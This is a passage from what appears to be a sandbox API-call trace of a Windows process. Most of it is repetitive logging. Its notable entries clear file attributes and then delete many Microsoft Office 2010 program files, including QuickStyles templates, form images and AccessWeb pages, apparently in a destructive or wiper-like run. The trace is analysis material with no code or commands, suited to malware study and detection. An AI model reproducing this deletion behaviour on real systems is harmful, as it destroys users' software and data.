Office\\Office14\\1033\\DataServices\\+NewSQLServerConnection.odc" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\dataservices\\+newsqlserverconnection.odc")) returned 1 [0071.351] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.351] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.352] CoTaskMemFree (pv=0x506980) [0071.356] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.356] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.356] CoTaskMemFree (pv=0x506980) [0071.364] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.364] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.364] CoTaskMemFree (pv=0x506980) [0071.365] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.365] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.366] CoTaskMemFree (pv=0x506980) [0071.366] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.367] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.367] CoTaskMemFree (pv=0x506980) [0071.367] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.367] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.368] CoTaskMemFree (pv=0x506980) [0071.370] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.370] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.370] CoTaskMemFree (pv=0x506980) [0071.371] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.371] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.371] CoTaskMemFree (pv=0x506980) [0071.372] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.372] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.372] CoTaskMemFree (pv=0x506980) [0071.373] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.373] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.373] CoTaskMemFree (pv=0x506980) [0071.374] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.374] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.374] CoTaskMemFree (pv=0x506980) [0071.375] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.375] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.375] CoTaskMemFree (pv=0x506980) [0071.376] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.376] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.376] CoTaskMemFree (pv=0x506980) [0071.376] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.376] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.377] CoTaskMemFree (pv=0x506980) [0071.380] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0071.383] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\arrow.png", dwFileAttributes=0x80) returned 1 [0071.384] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\arrow.png" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\arrow.png")) returned 1 [0071.386] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4 | out: lpFreeBytesAvailableToCaller=0x2af104, lpTotalNumberOfBytes=0x2af0fc, lpTotalNumberOfFreeBytes=0x2af0f4) returned 1 [0071.390] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\gradient.png", dwFileAttributes=0x80) returned 1 [0071.390] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GrooveForms5\\FormsStyles\\Solutions\\gradient.png" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grooveforms5\\formsstyles\\solutions\\gradient.png")) returned 1 [0071.393] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.393] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.393] CoTaskMemFree (pv=0x506980) [0071.394] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.394] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.394] CoTaskMemFree (pv=0x506980) [0071.395] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.396] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.396] CoTaskMemFree (pv=0x506980) [0071.397] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.397] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.397] CoTaskMemFree (pv=0x506980) [0071.404] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.404] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.404] CoTaskMemFree (pv=0x506980) [0071.420] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.420] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.420] CoTaskMemFree (pv=0x506980) [0071.424] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.429] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Classic.dotx", dwFileAttributes=0x80) returned 1 [0071.429] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Classic.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\classic.dotx")) returned 1 [0071.432] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Default.dotx", dwFileAttributes=0x80) returned 1 [0071.437] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Default.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\default.dotx")) returned 1 [0071.440] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.445] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\DefaultBlackAndWhite.dotx", dwFileAttributes=0x80) returned 1 [0071.445] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\DefaultBlackAndWhite.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\defaultblackandwhite.dotx")) returned 1 [0071.448] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.452] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Distinctive.dotx", dwFileAttributes=0x80) returned 1 [0071.452] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Distinctive.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\distinctive.dotx")) returned 1 [0071.455] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.460] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Elegant.dotx", dwFileAttributes=0x80) returned 1 [0071.460] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Elegant.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\elegant.dotx")) returned 1 [0071.463] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.468] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Fancy.dotx", dwFileAttributes=0x80) returned 1 [0071.468] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Fancy.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\fancy.dotx")) returned 1 [0071.471] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.475] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Formal.dotx", dwFileAttributes=0x80) returned 1 [0071.475] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Formal.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\formal.dotx")) returned 1 [0071.478] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.483] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Manuscript.dotx", dwFileAttributes=0x80) returned 1 [0071.483] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Manuscript.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\manuscript.dotx")) returned 1 [0071.487] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.491] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Modern.dotx", dwFileAttributes=0x80) returned 1 [0071.491] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Modern.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\modern.dotx")) returned 1 [0071.495] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Newsprint.dotx", dwFileAttributes=0x80) returned 1 [0071.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Newsprint.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\newsprint.dotx")) returned 1 [0071.568] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.574] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Perspective.dotx", dwFileAttributes=0x80) returned 1 [0071.574] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Perspective.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\perspective.dotx")) returned 1 [0071.577] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.581] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Simple.dotx", dwFileAttributes=0x80) returned 1 [0071.581] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Simple.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\simple.dotx")) returned 1 [0071.584] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.590] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Thatch.dotx", dwFileAttributes=0x80) returned 1 [0071.590] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Thatch.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\thatch.dotx")) returned 1 [0071.596] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0071.601] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Traditional.dotx", dwFileAttributes=0x80) returned 1 [0071.601] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\QuickStyles\\Traditional.dotx" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\quickstyles\\traditional.dotx")) returned 1 [0071.605] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.605] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.605] CoTaskMemFree (pv=0x506980) [0071.605] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.605] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.605] CoTaskMemFree (pv=0x506980) [0071.607] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.607] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.607] CoTaskMemFree (pv=0x506980) [0071.608] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.608] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.608] CoTaskMemFree (pv=0x506980) [0071.609] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\CLNTWRAP.HTM", dwFileAttributes=0x80) returned 1 [0071.615] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\CLNTWRAP.HTM" (normalized: "c:\\program files\\microsoft office\\office14\\accessweb\\clntwrap.htm")) returned 1 [0071.617] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.629] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\SERVWRAP.ASP", dwFileAttributes=0x80) returned 1 [0071.629] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\AccessWeb\\SERVWRAP.ASP" (normalized: "c:\\program files\\microsoft office\\office14\\accessweb\\servwrap.asp")) returned 1 [0071.631] CoTaskMemAlloc (cb=0x20c) returned 0x506980 [0071.632] GetSystemDirectoryW (in: lpBuffer=0x506980, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0071.632] CoTaskMemFree (pv=0x506980) [0071.635] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0071.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.652] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.652] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.653] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.653] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.654] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.654] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.656] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.657] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.657] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.658] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.663] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.663] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.668] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.668] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.671] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.672] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.672] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.673] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.673] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.674] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.674] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.675] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.675] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.676] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.676] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.677] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.677] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.678] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.678] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.679] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.679] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.680] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.680] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.681] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.681] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.682] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.682] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.683] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.683] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.684] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.684] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.685] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.685] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.686] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.686] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.687] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.687] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.688] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.688] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.689] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.689] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.690] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.690] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0071.691] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0071.691] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0071.692] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0071.692] SetThreadErrorMode 